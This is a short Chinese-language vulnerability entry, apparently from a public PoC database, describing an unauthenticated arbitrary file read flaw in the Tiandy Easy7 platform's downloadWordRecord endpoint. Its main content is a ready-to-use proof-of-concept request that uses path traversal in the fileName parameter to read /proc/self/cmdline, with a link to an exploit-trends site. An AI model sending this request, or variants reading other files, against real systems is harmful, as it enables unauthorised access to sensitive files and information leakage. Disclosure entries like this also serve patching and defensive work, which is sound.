天地伟业Easy7 downloadWordRecord 任意文件读取漏洞

2025-10-23 天地伟业Easy7 PoC Public

Description

天地伟业Easy7平台存在前台的任意文件读取接口,可构造请求包,读取系统内部敏感文件,造成信息泄露。

PoC

POST /Easy7/rest/file/downloadWordRecord?fileName=../../../../../../../proc/self/cmdline/ HTTP/1.1

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities